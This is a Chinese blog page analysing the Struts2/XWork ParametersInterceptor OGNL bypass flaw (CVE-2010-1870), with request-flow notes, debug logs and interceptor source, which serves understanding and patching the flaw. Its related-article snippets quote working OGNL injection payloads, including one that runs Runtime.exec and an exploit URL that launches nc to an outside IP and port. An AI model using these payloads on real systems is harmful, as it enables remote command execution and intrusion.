XWork ParameterInterceptor类绕过安全限制漏洞-解决1

最新推荐文章于 2022-01-18 11:56:55 发布
最新推荐文章于 2022-01-18 11:56:55 发布
阅读量87 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: web.xml java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_33889665/article/details/85073587
这个问题是如何发生的呢?下面深入看看:
? Struts2官方站点提供的Struts 2 的整体结构
wps_clip_image-51
 
一个请求在Struts2框架中的处理大概分为以下几个步骤:
Struts2框架的调用流程:
1、当Servlet容器接收到一个请求后,将请求交给你在web.xml中配置的过滤器FilterDispatcher,调用它的doFilter()方法。
 
2FilterDispatcher询问ActionMapper,以便确定这个请求是否有对应的action调用。
 
3ActionMapper返回一个描述了action调用的ActionMapping对象。
 
4FilterDispatcher调用Dispatcher类的serviceAction()方法。
 
5Dispatcher调用ActionProxyexecuted()方法。
 
6ActionProxy设置ActionInvocation对象的执行上下文,然后调用其invoke()方法。
 
7ActionInvocationinvoke()方法从拦截器映射中查找尚未执行的拦截器,调用它的interceptinvocation)方法,并将自身对象的引用作为参数传递给拦截器。
 
8、拦截器完成某些预处理工作后,反过来调用ActionInvocationinvoke()方法。
ActionInvocation维护着自己的状态,所以它知道哪些拦截器已经被执行,如果还有未执行的拦截器,就继续执行它的interceptinvocation)方法。
 
9、如果所有的拦截器都已经执行过了,就调用action实例的executed()方法(如果struts.xml文件中没有被设置成其他方法的话)。
 
10ActionInvocation根据action执行返回的接过码,查找对应的Result,调用Resultexecutedinvocation)的方法,将结果页面呈现给用户。
 
11ActionInvocationinvoke()方法将控制权返回给拦截器映射中的最后一个拦截器,该拦截器完成所有必须的后期处理工作,然后从interceinvocation)方法返回,允许前一个拦截器执行它自己的后续处理工作。如次反复,直到所有的拦截器都成功返回。
 
12ActionInvocationinvoke()方法执行完毕后,向ActionProxy返回一个String类型的结果码,最后,ActionProxy清理状态并返回。
 
这个究竟发生在哪个流程呢?
我们访问:
http://test.struts.com/admin/modelAdmin!listModel.action?cid=000H000A
DEBUG整个流程:
DEBUG [com.opensymphony.xwork2.interceptor.StaticParametersInterceptor] - Setting static parameters {}
2010-07-19 13:36:26,718
DEBUG [com.opensymphony.xwork2.interceptor.ParametersInterceptor] - Setting params cid => [ 000H000A ]
可以看到,发生在拦截器那个流程,处理请求参数的ParameterInterceptor 类,还记得第七步说什么吗?
7、ActionInvocation的invoke()方法从拦截器映射中查找尚未执行的拦截器,调用它的intercept(invocation)方法,并将自身对象的引用作为参数传递给拦截器。
就是调用:ParameterInterceptor 的
intercept(ActionInvocation invocation)
public class ParametersInterceptor extends MethodFilterInterceptor
{
public String doIntercept(ActionInvocation invocation)
    throws Exception
  {
    Object action = invocation.getAction();
    if (!(action instanceof NoParameters)) {
      ActionContext ac = invocation.getInvocationContext();
      Map parameters = ac.getParameters();
      if (LOG.isDebugEnabled()) {
LOG.debug("Setting params " + getParameterLogMap(parameters));
      }
      if (parameters != null) {
        Map contextMap = ac.getContextMap();
        try {
          OgnlContextState.setCreatingNullObjects(contextMap, true);
          OgnlContextState.setDenyMethodExecution(contextMap, true);
          OgnlContextState.setReportingConversionErrors(contextMap, true);
          ValueStack stack = ac.getValueStack();
          setParameters(action, stack, parameters);
        } finally {
          OgnlContextState.setCreatingNullObjects(contextMap, false);
          OgnlContextState.setDenyMethodExecution(contextMap, false);
          OgnlContextState.setReportingConversionErrors(contextMap, false);
        }
      }
    }
    return invocation.invoke();
  }
,,,,
XWork绕过安全限制执行任意命令漏洞补丁
08-20
CVE ID: CVE-2010-1870 XWork是一个命令模式框架,用于支持Struts 2及其他应用。 XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。 Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将: user.address.city=Bishkek&user['favoriteDrink']=kumys 转换为: action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys") 这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。 除了获取和设置属性外,OGNL还支持其他一些功能: * 方法调用:foo() * 静态方式调用: @java.lang.System@exit(1) * 构建函数调用:new MyClass() * 处理上下文变量:#foo = new MyClass() 由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行: * OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true) * SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false) 为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量: * #application * #session * #request * #parameters * #attr * #context * #_memberAccess * #root * #this * #_typeResolver * #_classResolver * #_traceEvaluations * #_lastEvaluation * #_keepLastEvaluation 这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: #_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = @java.lang.Runtime@getRuntime() #rt.exec('mkdir /tmp/PWNED')
Apache的Struts2框架严重安全漏洞
07-20
Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令 http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22/usr/bin/nc%2067.205.52.169%208888%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1
XWork ParameterInterceptor绕过安全限制漏洞-解决2
weixin_33937499的博客
07-19 243
OK,问题找到了,其实这个问题,在2008年有似描述:http://www.hacker.cn/News/ldgg/2008-11-7/08117107B0EE.shtml ActionContext ac = invocation.getInvocationContext(); Map parameters = ac.getParameters(); 事实上,随着项目应用的广泛,参数的多...
XWork ParameterInterceptor绕过安全限制漏洞-描述
weixin_33721344的博客
07-19 414
      ? XWork ParameterInterceptor绕过安全限制漏洞     问题描述:     XWork ParameterInterceptor绕过安全限制漏洞         发布日期:2010-07-09     更新日期:2010-07-15         受影响系统:   ...
xwork-2.1.5-all.rar_xwork_xwork-2.1.5_xwork-2.1.5.jar_xwork-core
09-21
xwork-2.1.5.jar包含了整个框架的功能,而xwork-core-2.1.6.jar则是核心模块,包含Action、Interceptor等关键组件。 7. **与Struts2的关系**: XWork与Struts2紧密相关,Struts2是基于XWork构建的一个MVC框架,它...
xwork-2.1.2.rar_xwork-2.1.2_xwork-core_xwork-core-2.1.2_xwork2.1
09-24
1. **集成到项目**:将xwork-2.1.2.jar添加到项目的路径中,确保与Struts2框架版本匹配。 2. **配置Struts2**:在struts.xml配置文件中,定义Action和对应的,指定拦截器栈。 3. **创建Action**:编写Action...
xwork-core-2.3.37.jar
05-28
用于解决struts2升级至2.3.37时 出现java.lang.NoSuchMethodError: com.opensymphony.xwork2.ActionContext.put(Ljava/lang/异常时,更换的xwork-core-2.3.37.jar
JavaEE源代码 xwork-2.0.4
07-09
JavaEE源代码 xwork-2.0.4JavaEE源代码 xwork-2.0.4JavaEE源代码 xwork-2.0.4JavaEE源代码 xwork-2.0.4JavaEE源代码 xwork-2.0.4JavaEE源代码 xwork-2.0.4JavaEE源代码 xwork-2.0.4JavaEE源代码 xwork-2.0.4JavaEE源...
Struts2安全漏洞(转载绿盟)
iteye_18492的博客
07-19 274
XWork ParameterInterceptor绕过安全限制漏洞 受影响系统: OpenSymphony XWork < 2.2.0Apache Group Struts < 2.2.0 描述: CVE ID: CVE-2010-1870XWork是一个命令模式框架,用于支持Struts 2及其他应用。 Struts2中WebWork框架使用XWork基于HTTP参数名...
关于struts2漏洞问题及解决办法
04-21
NULL 博文链接:https://superseven.iteye.com/blog/1914667
Apache Struts2 XWork绕过安全限制执行任意命令漏洞是否在Struts1中存在
大哲
08-12 534
Apache Struts2 XWork绕过安全限制执行任意命令漏洞 发布日期:2010-07-09更新日期:2010-07-15受影响系统: OpenSymphony XWork < 2.2.0Apache Group Struts < 2.2.0 描述: BUGTRAQ ID: 41592CVE ID: CVE-2010-1870    有哪位大侠知...
struts2/xwork漏洞
06-12 201
介绍struts2/xwork的Remote Command Execution Vulnerability漏洞,剖析了原因并供给了处理方法,能够拜见http://my-corner.iteye.com/blog/720209 去struts官网逛了一下,发现第一种处理方法晋级到struts2.2版别(当时的最新版),最终仍是没有彻底处理该疑问。当前,需求处理该疑问需求更新至2.3.1.2或
Apache Struts ‘ParameterInterceptorOGNL安全绕过漏洞
weixin_30338497的博客
05-23 355
漏洞名称: Apache Struts ‘ParameterInterceptorOGNL安全绕过漏洞 CNNVD编号: CNNVD-201305-486 发布时间: 2013-05-23 更新时间: 2013-05-23 危害等级: 漏洞型: 权限许可和访问控制 威胁型: ...
Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补
JAVA
07-27 351
1.exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞,此漏洞危害之大,可谓百发百中,直接root,只要采用了Struts2和webwork框架的系统(对于webwork的版本,不太清楚,我这里没环境对其一一测试,这里有两者关系的介绍),基本上无一幸免。 2.昨天在接到朋友的提醒后,迅速将公司的一些使用此框架开发的项目漏洞修补了,我想大部分大公司的也在第一时...
Struts2/XWork远程执行任意代码漏洞
行到水穷处,坐看云起时。
02-28 1973
前段时间遇到黑客,才知道这个问题,找了一些资料了解一下 通过修改一些值能够调用被保护的Java代码,并且执行任意的Java代码: #_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false") #context['xwork.MethodAccesso
Struts2/XWork 安全漏洞解决办法
个人积累
08-11 2301
<br />exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。 <br />漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability <br />相关介绍: http://www.exploit-db.com/exploits/14360/ http://sebug.net/exploit/19954/ <br /><br />Struts2的核心是使用的webwork框架,处理 action时通过
[旧文系列] Struts2历史高危漏洞系列-part4:S2-016/S2-032/S2-045
mole_exp的博客
01-18 1859
文章目录关于<旧文系列>前言S2-016漏洞复现与分析可回显PoC漏洞修复S2-032漏洞复现与分析可回显PoC漏洞修复S2-045漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值